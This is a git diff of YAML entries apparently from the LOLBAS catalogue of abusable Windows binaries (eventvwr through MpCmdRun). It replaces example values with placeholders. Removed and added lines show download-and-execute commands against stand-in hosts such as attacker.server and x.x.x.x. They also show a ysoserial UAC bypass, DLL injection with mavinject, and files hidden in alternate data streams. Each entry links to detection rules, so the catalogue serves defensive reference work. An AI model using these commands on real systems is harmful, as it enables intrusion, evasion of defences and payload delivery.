@ -14,7 +14,7 @@ Commands:
Tags:
- Application: GUI
- Execute: EXE
- Command: ysoserial.exe -o raw -f BinaryFormatter - g DataSet -c calc > RecentViews & copy RecentViews %LOCALAPPDATA%\Microsoft\EventV~1\RecentViews & eventvwr.exe
- Command: ysoserial.exe -o raw -f BinaryFormatter - g DataSet -c "{CMD}" > RecentViews & copy RecentViews %LOCALAPPDATA%\Microsoft\EventV~1\RecentViews & eventvwr.exe
Description: During startup, eventvwr.exe uses .NET deserialization with %LOCALAPPDATA%\Microsoft\EventV~1\RecentViews file. This file can be created using https://github.com/pwntester/ysoserial.net
Usecase: Execute a command to bypass security restrictions that limit the use of command-line interpreters.
Category: UAC Bypass

8
yml/OSBinaries/Expand.yml
View File

@ -1,24 +1,24 @@
---
Name: Expand.exe
Description: Binary that expands one or more compressed files
Author: 'Oddvar Moe'
Author: Oddvar Moe
Created: 2018-05-25
Commands:
- Command: expand \\webdav\folder\file.bat c:\ADS\file.bat
- Command: expand {PATH_SMB:.bat} {PATH_ABSOLUTE:.bat}
Description: Copies source file to destination.
Usecase: Use to copies the source file to the destination file
Category: Download
Privileges: User
MitreID: T1105
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
- Command: expand c:\ADS\file1.bat c:\ADS\file2.bat
- Command: expand {PATH_ABSOLUTE:.source.ext} {PATH_ABSOLUTE:.dest.ext}
Description: Copies source file to destination.
Usecase: Copies files from A to B
Category: Copy
Privileges: User
MitreID: T1105
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
- Command: expand \\webdav\folder\file.bat c:\ADS\file.txt:file.bat
- Command: expand {PATH_SMB:.bat} {PATH_ABSOLUTE}:file.bat
Description: Copies source file to destination Alternate Data Stream (ADS)
Usecase: Copies files from A to B
Category: ADS

6
yml/OSBinaries/Explorer.yml
View File

@ -4,8 +4,8 @@ Description: Binary used for managing files and system components within Windows
Author: Jai Minton
Created: 2020-06-24
Commands:
- Command: explorer.exe /root,"C:\Windows\System32\calc.exe"
Description: Execute calc.exe with the parent process spawning from a new instance of explorer.exe
- Command: explorer.exe /root,"{PATH_ABSOLUTE:.exe}"
Description: Execute specified .exe with the parent process spawning from a new instance of explorer.exe
Usecase: Performs execution of specified file with explorer parent process breaking the process tree, can be used for defense evasion.
Category: Execute
Privileges: User
@ -13,7 +13,7 @@ Commands:
OperatingSystem: Windows XP, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: EXE
- Command: explorer.exe C:\Windows\System32\notepad.exe
- Command: explorer.exe {PATH_ABSOLUTE:.exe}
Description: Execute notepad.exe with the parent process spawning from a new instance of explorer.exe
Usecase: Performs execution of specified file with explorer parent process breaking the process tree, can be used for defense evasion.
Category: Execute

6
yml/OSBinaries/Extexport.yml
View File

@ -1,11 +1,11 @@
---
Name: Extexport.exe
Description: Load a DLL located in the c:\test folder with a specific name.
Author: 'Oddvar Moe'
Author: Oddvar Moe
Created: 2018-05-25
Commands:
- Command: Extexport.exe c:\test foo bar
Description: Load a DLL located in the c:\test folder with one of the following names mozcrt19.dll, mozsqlite3.dll, or sqlite.dll
- Command: Extexport.exe {PATH_ABSOLUTE:folder} foo bar
Description: Load a DLL located in the specified folder with one of the following names mozcrt19.dll, mozsqlite3.dll, or sqlite.dll.
Usecase: Execute dll file
Category: Execute
Privileges: User

14
yml/OSBinaries/Extrac32.yml
View File

@ -1,10 +1,10 @@
---
Name: Extrac32.exe
Description: Extract to ADS, copy or overwrite a file with Extrac32.exe
Author: 'Oddvar Moe'
Author: Oddvar Moe
Created: 2018-05-25
Commands:
- Command: extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe
- Command: extrac32 {PATH_ABSOLUTE:.cab} {PATH_ABSOLUTE}:file.exe
Description: Extracts the source CAB file into an Alternate Data Stream (ADS) of the target file.
Usecase: Extract data from cab file and hide it in an alternate data stream.
Category: ADS
@ -13,7 +13,7 @@ Commands:
OperatingSystem: Windows XP, Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Type: Compression
- Command: extrac32 \\webdavserver\webdav\file.cab c:\ADS\file.txt:file.exe
- Command: extrac32 {PATH_ABSOLUTE:.cab} {PATH_ABSOLUTE}:file.exe
Description: Extracts the source CAB file on an unc path into an Alternate Data Stream (ADS) of the target file.
Usecase: Extract data from cab file and hide it in an alternate data stream.
Category: ADS
@ -22,15 +22,15 @@ Commands:
OperatingSystem: Windows XP, Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Type: Compression
- Command: extrac32 /Y /C \\webdavserver\share\test.txt C:\folder\test.txt
- Command: extrac32 /Y /C {PATH_SMB} {PATH_ABSOLUTE}
Description: Copy the source file to the destination file and overwrite it.
Usecase: Download file from UNC/WEBDav
Category: Download
Privileges: User
MitreID: T1105
OperatingSystem: Windows XP, Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
- Command: extrac32.exe /C C:\Windows\System32\calc.exe C:\Users\user\Desktop\calc.exe
Description: Command for copying calc.exe to another folder
- Command: extrac32.exe /C {PATH_ABSOLUTE:.source.exe} {PATH_ABSOLUTE:.dest.exe}
Description: Command for copying file from one folder to another
Usecase: Copy file
Category: Copy
Privileges: User
@ -39,8 +39,6 @@ Commands:
Full_Path:
- Path: C:\Windows\System32\extrac32.exe
- Path: C:\Windows\SysWOW64\extrac32.exe
Code_Sample:
- Code:
Detection:
- Elastic: https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_misc_lolbin_connecting_to_the_internet.toml
- Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_extrac32.yml

12
yml/OSBinaries/Findstr.yml
View File

@ -1,17 +1,17 @@
---
Name: Findstr.exe
Description: Write to ADS, discover, or download files with Findstr.exe
Author: 'Oddvar Moe'
Author: Oddvar Moe
Created: 2018-05-25
Commands:
- Command: findstr /V /L W3AllLov3LolBas c:\ADS\file.exe > c:\ADS\file.txt:file.exe
Description: Searches for the string W3AllLov3LolBas, since it does not exist (/V) file.exe is written to an Alternate Data Stream (ADS) of the file.txt file.
- Command: findstr /V /L W3AllLov3LolBas {PATH_ABSOLUTE:.exe} > {PATH_ABSOLUTE}:file.exe
Description: Searches for the string W3AllLov3LolBas, since it does not exist (/V) the specified .exe file is written to an Alternate Data Stream (ADS) of the specified target file.
Usecase: Add a file to an alternate data stream to hide from defensive counter measures
Category: ADS
Privileges: User
MitreID: T1564.004
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
- Command: findstr /V /L W3AllLov3LolBas \\webdavserver\folder\file.exe > c:\ADS\file.txt:file.exe
- Command: findstr /V /L W3AllLov3LolBas {PATH_SMB:.exe} > {PATH_ABSOLUTE}:file.exe
Description: Searches for the string W3AllLov3LolBas, since it does not exist (/V) file.exe is written to an Alternate Data Stream (ADS) of the file.txt file.
Usecase: Add a file to an alternate data stream from a webdav server to hide from defensive counter measures
Category: ADS
@ -25,7 +25,7 @@ Commands:
Privileges: User
MitreID: T1552.001
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
- Command: findstr /V /L W3AllLov3LolBas \\webdavserver\folder\file.exe > c:\ADS\file.exe
- Command: findstr /V /L W3AllLov3LolBas {PATH_SMB:.exe} > {PATH_ABSOLUTE:.exe}
Description: Searches for the string W3AllLov3LolBas, since it does not exist (/V) file.exe is downloaded to the target file.
Usecase: Download/Copy file from webdav server
Category: Download
@ -35,8 +35,6 @@ Commands:
Full_Path:
- Path: C:\Windows\System32\findstr.exe
- Path: C:\Windows\SysWOW64\findstr.exe
Code_Sample:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_findstr.yml
Resources:

10
yml/OSBinaries/Forfiles.yml
View File

@ -1,11 +1,11 @@
---
Name: Forfiles.exe
Description: Selects and executes a command on a file or set of files. This command is useful for batch processing.
Author: 'Oddvar Moe'
Author: Oddvar Moe
Created: 2018-05-25
Commands:
- Command: forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe
Description: Executes calc.exe since there is a match for notepad.exe in the c:\windows\System32 folder.
- Command: forfiles /p c:\windows\system32 /m notepad.exe /c "{CMD}"
Description: Executes specified command since there is a match for notepad.exe in the c:\windows\System32 folder.
Usecase: Use forfiles to start a new process to evade defensive counter measures
Category: Execute
Privileges: User
@ -13,7 +13,7 @@ Commands:
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: EXE
- Command: forfiles /p c:\windows\system32 /m notepad.exe /c "c:\folder\normal.dll:evil.exe"
- Command: forfiles /p c:\windows\system32 /m notepad.exe /c "{PATH_ABSOLUTE}:evil.exe"
Description: Executes the evil.exe Alternate Data Stream (AD) since there is a match for notepad.exe in the c:\windows\system32 folder.
Usecase: Use forfiles to start a new process from a binary hidden in an alternate data stream
Category: ADS
@ -25,8 +25,6 @@ Commands:
Full_Path:
- Path: C:\Windows\System32\forfiles.exe
- Path: C:\Windows\SysWOW64\forfiles.exe
Code_Sample:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_forfiles.yml
Resources:

4
yml/OSBinaries/Fsutil.yml
View File

@ -1,10 +1,10 @@
---
Name: Fsutil.exe
Description: File System Utility
Author: 'Elliot Killick'
Author: Elliot Killick
Created: 2021-08-16
Commands:
- Command: fsutil.exe file setZeroData offset=0 length=9999999999 C:\Windows\Temp\payload.dll
- Command: fsutil.exe file setZeroData offset=0 length=9999999999 {PATH_ABSOLUTE}
Description: Zero out a file
Usecase: Can be used to forensically erase a file
Category: Tamper

6
yml/OSBinaries/Ftp.yml
View File

@ -1,10 +1,10 @@
---
Name: Ftp.exe
Description: A binary designed for connecting to FTP servers
Author: 'Oddvar Moe'
Author: Oddvar Moe
Created: 2018-12-10
Commands:
- Command: echo !calc.exe > ftpcommands.txt && ftp -s:ftpcommands.txt
- Command: echo !{CMD} > ftpcommands.txt && ftp -s:ftpcommands.txt
Description: Executes the commands you put inside the text file.
Usecase: Spawn new process using ftp.exe. Ftp.exe runs cmd /C YourCommand
Category: Execute
@ -23,8 +23,6 @@ Commands:
Full_Path:
- Path: C:\Windows\System32\ftp.exe
- Path: C:\Windows\SysWOW64\ftp.exe
Code_Sample:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_ftp.yml
- IOC: cmd /c as child process of ftp.exe

4
yml/OSBinaries/Gpscript.yml
View File

@ -1,7 +1,7 @@
---
Name: Gpscript.exe
Description: Used by group policy to process scripts
Author: 'Oddvar Moe'
Author: Oddvar Moe
Created: 2018-05-25
Commands:
- Command: Gpscript /logon
@ -25,8 +25,6 @@ Commands:
Full_Path:
- Path: C:\Windows\System32\gpscript.exe
- Path: C:\Windows\SysWOW64\gpscript.exe
Code_Sample:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_gpscript.yml
- IOC: Scripts added in local group policy

16
yml/OSBinaries/Hh.yml
View File

@ -1,11 +1,11 @@
---
Name: Hh.exe
Description: Binary used for processing chm files in Windows
Author: 'Oddvar Moe'
Author: Oddvar Moe
Created: 2018-05-25
Commands:
- Command: HH.exe http://some.url/script.ps1
Description: Open the target PowerShell script with HTML Help.
- Command: HH.exe {REMOTEURL:.bat}
Description: Open the target batch script with HTML Help.
Usecase: Download files from url
Category: Download
Privileges: User
@ -14,8 +14,8 @@ Commands:
Tags:
- Execute: EXE
- Application: GUI
- Command: HH.exe c:\windows\system32\calc.exe
Description: Executes calc.exe with HTML Help.
- Command: HH.exe {PATH_ABSOLUTE:.exe}
Description: Executes specified executable with HTML Help.
Usecase: Execute process with HH.exe
Category: Execute
Privileges: User
@ -24,8 +24,8 @@ Commands:
Tags:
- Execute: EXE
- Application: GUI
- Command: HH.exe http://some.url/payload.chm
Description: Executes a remote payload.chm file which can contain commands.
- Command: HH.exe {REMOTEURL:.chm}
Description: Executes a remote .chm file which can contain commands.
Usecase: Execute commands with HH.exe
Category: Execute
Privileges: User
@ -38,8 +38,6 @@ Commands:
Full_Path:
- Path: C:\Windows\hh.exe
- Path: C:\Windows\SysWOW64\hh.exe
Code_Sample:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_hh_chm_execution.yml
- Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_hh_html_help_susp_child_process.yml

4
yml/OSBinaries/IMEWDBLD.yml
View File

@ -1,10 +1,10 @@
---
Name: IMEWDBLD.exe
Description: Microsoft IME Open Extended Dictionary Module
Author: 'Wade Hickey'
Author: Wade Hickey
Created: 2020-03-05
Commands:
- Command: C:\Windows\System32\IME\SHARED\IMEWDBLD.exe https://pastebin.com/raw/tdyShwLw
- Command: C:\Windows\System32\IME\SHARED\IMEWDBLD.exe {REMOTEURL}
Description: IMEWDBLD.exe attempts to load a dictionary file, if provided a URL as an argument, it will download the file served at by that URL and save it to INetCache.
Usecase: Download file from Internet
Category: Download

4
yml/OSBinaries/Ie4uinit.yml
View File

@ -1,7 +1,7 @@
---
Name: Ie4uinit.exe
Description: Executes commands from a specially prepared ie4uinit.inf file.
Author: 'Oddvar Moe'
Author: Oddvar Moe
Created: 2018-05-25
Commands:
- Command: ie4uinit.exe -BaseSettings
@ -18,8 +18,6 @@ Full_Path:
- Path: c:\windows\sysWOW64\ie4uinit.exe
- Path: c:\windows\system32\ieuinit.inf
- Path: c:\windows\sysWOW64\ieuinit.inf
Code_Sample:
- Code:
Detection:
- IOC: ie4uinit.exe copied outside of %windir%
- IOC: ie4uinit.exe loading an inf file (ieuinit.inf) from outside %windir%

2
yml/OSBinaries/Iediagcmd.yml
View File

@ -4,7 +4,7 @@ Description: Diagnostics Utility for Internet Explorer
Author: manasmbellani
Created: 2022-03-29
Commands:
- Command: 'set windir=c:\test& cd "C:\Program Files\Internet Explorer\" & iediagcmd.exe /out:c:\test\foo.cab'
- Command: 'set windir=c:\test& cd "C:\Program Files\Internet Explorer\" & iediagcmd.exe /out:{PATH_ABSOLUTE:.cab}'
Description: Executes binary that is pre-planted at C:\test\system32\netsh.exe.
Usecase: Spawn a pre-planted executable from iediagcmd.exe.
Category: Execute

12
yml/OSBinaries/Ieexec.yml
View File

@ -1,11 +1,11 @@
---
Name: Ieexec.exe
Description: The IEExec.exe application is an undocumented Microsoft .NET Framework application that is included with the .NET Framework. You can use the IEExec.exe application as a host to run other managed applications that you start by using a URL.
Author: 'Oddvar Moe'
Author: Oddvar Moe
Created: 2018-05-25
Commands:
- Command: ieexec.exe http://x.x.x.x:8080/bypass.exe
Description: Downloads and executes bypass.exe from the remote server.
- Command: ieexec.exe {REMOTEURL:.exe}
Description: Downloads and executes executable from the remote server.
Usecase: Download and run attacker code from remote location
Category: Download
Privileges: User
@ -14,8 +14,8 @@ Commands:
Tags:
- Execute: Remote
- Execute: EXE (.NET)
- Command: ieexec.exe http://x.x.x.x:8080/bypass.exe
Description: Downloads and executes bypass.exe from the remote server.
- Command: ieexec.exe {REMOTEURL:.exe}
Description: Downloads and executes executable from the remote server.
Usecase: Download and run attacker code from remote location
Category: Execute
Privileges: User
@ -27,8 +27,6 @@ Commands:
Full_Path:
- Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\ieexec.exe
- Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\ieexec.exe
Code_Sample:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_ieexec_download.yml
- Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml

7
yml/OSBinaries/Ilasm.yml
View File

@ -4,14 +4,14 @@ Description: used for compile c# code into dll or exe.
Author: Hai vaknin (lux)
Created: 2020-03-17
Commands:
- Command: ilasm.exe C:\public\test.txt /exe
- Command: ilasm.exe {PATH_ABSOLUTE:.txt} /exe
Description: Binary file used by .NET to compile C#/intermediate (IL) code to .exe
Usecase: Compile attacker code on system. Bypass defensive counter measures.
Category: Compile
Privileges: User
MitreID: T1127
OperatingSystem: Windows 7, Windows 10, Windows 11
- Command: ilasm.exe C:\public\test.txt /dll
- Command: ilasm.exe {PATH_ABSOLUTE:.txt} /dll
Description: Binary file used by .NET to compile C#/intermediate (IL) code to dll
Usecase: A description of the usecase
Category: Compile
@ -21,8 +21,6 @@ Commands:
Full_Path:
- Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe
- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe
Code_Sample:
- Code:
Detection:
- IOC: Ilasm may not be used often in production environments (such as on endpoints)
- Sigma: https://github.com/SigmaHQ/sigma/blob/bea6f18d350d9c9fdc067f93dde0e9b11cc22dc2/rules/windows/process_creation/proc_creation_win_lolbin_ilasm.yml
@ -32,4 +30,3 @@ Acknowledgement:
- Person: Hai Vaknin(Lux)
Handle: '@VakninHai'
- Person: Lior Adar
Handle:

4
yml/OSBinaries/Infdefaultinstall.yml
View File

@ -1,10 +1,10 @@
---
Name: Infdefaultinstall.exe
Description: Binary used to perform installation based on content inside inf files
Author: 'Oddvar Moe'
Author: Oddvar Moe
Created: 2018-05-25
Commands:
- Command: InfDefaultInstall.exe Infdefaultinstall.inf
- Command: InfDefaultInstall.exe {PATH:.inf}
Description: Executes SCT script using scrobj.dll from a command in entered into a specially prepared INF file.
Usecase: Code execution
Category: Execute

6
yml/OSBinaries/Installutil.yml
View File

@ -4,7 +4,7 @@ Description: The Installer tool is a command-line utility that allows you to ins
Author: Oddvar Moe
Created: 2018-05-25
Commands:
- Command: InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll
- Command: InstallUtil.exe /logfile= /LogToConsole=false /U {PATH:.dll}
Description: Execute the target .NET DLL or EXE.
Usecase: Use to execute code and bypass application whitelisting
Category: AWL Bypass
@ -14,7 +14,7 @@ Commands:
Tags:
- Execute: DLL (.NET)
- Execute: EXE (.NET)
- Command: InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll
- Command: InstallUtil.exe /logfile= /LogToConsole=false /U {PATH:.dll}
Description: Execute the target .NET DLL or EXE.
Usecase: Use to execute code and bypass application whitelisting
Category: Execute
@ -24,7 +24,7 @@ Commands:
Tags:
- Execute: DLL (.NET)
- Execute: EXE (.NET)
- Command: InstallUtil.exe https://example.com/payload
- Command: InstallUtil.exe {REMOTEURL}
Description: It will download a remote payload and place it in INetCache.
Usecase: Downloads payload from remote server
Category: Download

12
yml/OSBinaries/Jsc.yml
View File

@ -1,11 +1,11 @@
---
Name: Jsc.exe
Description: Binary file used by .NET to compile JavaScript code to .exe or .dll format
Author: 'Oddvar Moe'
Author: Oddvar Moe
Created: 2019-05-31
Commands:
- Command: jsc.exe scriptfile.js
Description: Use jsc.exe to compile JavaScript code stored in scriptfile.js and output scriptfile.exe.
- Command: jsc.exe {PATH:.js}
Description: Use jsc.exe to compile JavaScript code stored in the provided .JS file and generate a .EXE file with the same name.
Usecase: Compile attacker code on system. Bypass defensive counter measures.
Category: Compile
Privileges: User
@ -13,8 +13,8 @@ Commands:
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: JScript
- Command: jsc.exe /t:library Library.js
Description: Use jsc.exe to compile JavaScript code stored in Library.js and output Library.dll.
- Command: jsc.exe /t:library {PATH:.js}
Description: Use jsc.exe to compile JavaScript code stored in the .JS file and generate a DLL file with the same name.
Usecase: Compile attacker code on system. Bypass defensive counter measures.
Category: Compile
Privileges: User
@ -27,8 +27,6 @@ Full_Path:
- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Jsc.exe
- Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\Jsc.exe
- Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Jsc.exe
Code_Sample:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/35a7244c62820fbc5a832e50b1e224ac3a1935da/rules/windows/process_creation/proc_creation_win_lolbin_jsc.yml
- IOC: Jsc.exe should normally not run a system unless it is used for development.

6
yml/OSBinaries/Ldifde.yml
View File

@ -1,11 +1,11 @@
---
Name: Ldifde.exe
Description: Creates, modifies, and deletes LDAP directory objects.
Author: 'Grzegorz Tworek'
Author: Grzegorz Tworek
Created: 2022-08-31
Commands:
- Command: Ldifde -i -f inputfile.ldf
Description: Import inputfile.ldf into LDAP. If the file contains http-based attrval-spec such as thumbnailPhoto:< http://example.org/somefile.txt, the file will be downloaded into IE temp folder.
- Command: Ldifde -i -f {PATH:.ldf}
Description: Import specified .ldf file into LDAP. If the file contains http-based attrval-spec such as thumbnailPhoto:< http://example.org/somefile.txt, the file will be downloaded into IE temp folder.
Usecase: Download file from Internet
Category: Download
Privileges: Administrator

8
yml/OSBinaries/Makecab.yml
View File

@ -4,7 +4,7 @@ Description: Binary to package existing files into a cabinet (.cab) file
Author: Oddvar Moe
Created: 2018-05-25
Commands:
- Command: makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab
- Command: makecab {PATH_ABSOLUTE:.exe} {PATH_ABSOLUTE}:autoruns.cab
Description: Compresses the target file into a CAB file stored in the Alternate Data Stream (ADS) of the target file.
Usecase: Hide data compressed into an alternate data stream
Category: ADS
@ -13,7 +13,7 @@ Commands:
OperatingSystem: Windows XP, Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Type: Compression
- Command: makecab \\webdavserver\webdav\file.exe C:\Folder\file.txt:file.cab
- Command: makecab {PATH_SMB:.exe} {PATH_ABSOLUTE}:file.cab
Description: Compresses the target file into a CAB file stored in the Alternate Data Stream (ADS) of the target file.
Usecase: Hide data compressed into an alternate data stream
Category: ADS
@ -22,7 +22,7 @@ Commands:
OperatingSystem: Windows XP, Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Type: Compression
- Command: makecab \\webdavserver\webdav\file.exe C:\Folder\file.cab
- Command: makecab {PATH_SMB:.exe} {PATH_ABSOLUTE:.cab}
Description: Download and compresses the target file and stores it in the target file.
Usecase: Download file and compress into a cab file
Category: Download
@ -31,7 +31,7 @@ Commands:
OperatingSystem: Windows XP, Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Type: Compression
- Command: makecab /F directives.ddf
- Command: makecab /F {PATH:.ddf}
Description: Execute makecab commands as defined in the specified Diamond Definition File (.ddf); see resources for the format specification.
Usecase: Bypass command-line based detections
Category: Execute

6
yml/OSBinaries/Mavinject.yml
View File

@ -1,10 +1,10 @@
---
Name: Mavinject.exe
Description: Used by App-v in Windows
Author: 'Oddvar Moe'
Author: Oddvar Moe
Created: 2018-05-25
Commands:
- Command: MavInject.exe 3110 /INJECTRUNNING c:\folder\evil.dll
- Command: MavInject.exe 3110 /INJECTRUNNING {PATH_ABSOLUTE:.dll}
Description: Inject evil.dll into a process with PID 3110.
Usecase: Inject dll file into running process
Category: Execute
@ -13,7 +13,7 @@ Commands:
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: DLL
- Command: Mavinject.exe 4172 /INJECTRUNNING "c:\ads\file.txt:file.dll"
- Command: Mavinject.exe 4172 /INJECTRUNNING {PATH_ABSOLUTE}:file.dll
Description: Inject file.dll stored as an Alternate Data Stream (ADS) into a process with PID 4172
Usecase: Inject dll file into running process
Category: ADS

12
yml/OSBinaries/Microsoft.Workflow.Compiler.yml
View File

@ -1,11 +1,11 @@
---
Name: Microsoft.Workflow.Compiler.exe
Description: A utility included with .NET that is capable of compiling and executing C# or VB.net code.
Author: 'Conor Richard'
Author: Conor Richard
Created: 2018-10-22
Commands:
- Command: Microsoft.Workflow.Compiler.exe tests.xml results.xml
Description: Compile and execute C# or VB.net code in a XOML file referenced in the test.xml file.
- Command: Microsoft.Workflow.Compiler.exe {PATH} {PATH:.log}
Description: Compile and execute C# or VB.net code in a XOML file referenced in the first argument (any extension accepted).
Usecase: Compile and run code
Category: Execute
Privileges: User
@ -14,7 +14,7 @@ Commands:
Tags:
- Execute: VB.Net
- Execute: Csharp
- Command: Microsoft.Workflow.Compiler.exe tests.txt results.txt
- Command: Microsoft.Workflow.Compiler.exe {PATH} {PATH:.log}
Description: Compile and execute C# or VB.net code in a XOML file referenced in the test.txt file.
Usecase: Compile and run code
Category: Execute
@ -23,7 +23,7 @@ Commands:
OperatingSystem: Windows 10S, Windows 11
Tags:
- Execute: XOML
- Command: Microsoft.Workflow.Compiler.exe tests.txt results.txt
- Command: Microsoft.Workflow.Compiler.exe {PATH} {PATH:.log}
Description: Compile and execute C# or VB.net code in a XOML file referenced in the test.txt file.
Usecase: Compile and run code
Category: AWL Bypass
@ -34,8 +34,6 @@ Commands:
- Execute: XOML
Full_Path:
- Path: C:\Windows\Microsoft.Net\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe
Code_Sample:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_workflow_compiler.yml
- Splunk: https://github.com/splunk/security_content/blob/961a81d4a5cb5c5febec4894d6d812497171a85c/detections/endpoint/suspicious_microsoft_workflow_compiler_usage.yml

4
yml/OSBinaries/Mmc.yml
View File

@ -4,7 +4,7 @@ Description: Load snap-ins to locally and remotely manage Windows systems
Author: '@bohops'
Created: 2018-12-04
Commands:
- Command: mmc.exe -Embedding c:\path\to\test.msc
- Command: mmc.exe -Embedding {PATH_ABSOLUTE:.msc}
Description: Launch a 'backgrounded' MMC process and invoke a COM payload
Usecase: Configure a snap-in to load a COM custom class (CLSID) that has been added to the registry
Category: Execute
@ -25,8 +25,6 @@ Commands:
Full_Path:
- Path: C:\Windows\System32\mmc.exe
- Path: C:\Windows\SysWOW64\mmc.exe
Code_Sample:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_mmc_susp_child_process.yml
- Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/file/file_event/file_event_win_uac_bypass_dotnet_profiler.yml

13
yml/OSBinaries/MpCmdRun.yml
View File

@ -1,26 +1,26 @@
---
Name: MpCmdRun.exe
Description: Binary part of Windows Defender. Used to manage settings in Windows Defender
Author: 'Oddvar Moe'
Author: Oddvar Moe
Created: 2020-03-20
Commands:
- Command: MpCmdRun.exe -DownloadFile -url https://attacker.server/beacon.exe -path c:\\temp\\beacon.exe
- Command: MpCmdRun.exe -DownloadFile -url {REMOTEURL:.exe} -path {PATH_ABSOLUTE:.exe}
Description: Download file to specified path - Slashes work as well as dashes (/DownloadFile, /url, /path)
Usecase: Download file
Category: Download
Privileges: User
MitreID: T1105
OperatingSystem: Windows 10
- Command: copy "C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\MpCmdRun.exe" C:\Users\Public\Downloads\MP.exe && chdir "C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\" && "C:\Users\Public\Downloads\MP.exe" -DownloadFile -url https://attacker.server/beacon.exe -path C:\Users\Public\Downloads\evil.exe
- Command: copy "C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\MpCmdRun.exe" C:\Users\Public\Downloads\MP.exe && chdir "C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\" && "C:\Users\Public\Downloads\MP.exe" -DownloadFile -url {REMOTEURL:.exe} -path C:\Users\Public\Downloads\evil.exe
Description: Download file to specified path - Slashes work as well as dashes (/DownloadFile, /url, /path) [updated version to bypass Windows 10 mitigation]
Usecase: Download file
Category: Download
Privileges: User
MitreID: T1105
OperatingSystem: Windows 10
- Command: MpCmdRun.exe -DownloadFile -url https://attacker.server/beacon.exe -path c:\temp\nicefile.txt:evil.exe
- Command: MpCmdRun.exe -DownloadFile -url {REMOTEURL:.exe} -path {PATH_ABSOLUTE:.exe}:evil.exe
Description: Download file to machine and store it in Alternate Data Stream
Usecase: Hide downloaded data inton an Alternate Data Stream
Usecase: Hide downloaded data into an Alternate Data Stream
Category: ADS
Privileges: User
MitreID: T1564.004
@ -32,8 +32,6 @@ Full_Path:
- Path: C:\Program Files\Windows Defender\MpCmdRun.exe
- Path: C:\Program Files (x86)\Windows Defender\MpCmdRun.exe
- Path: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23110.3-0\X86\MpCmdRun.exe
Code_Sample:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/159bf4bbc103cc2be3fef4b7c2e7c8b23b63fd10/rules/windows/process_creation/win_susp_mpcmdrun_download.yml
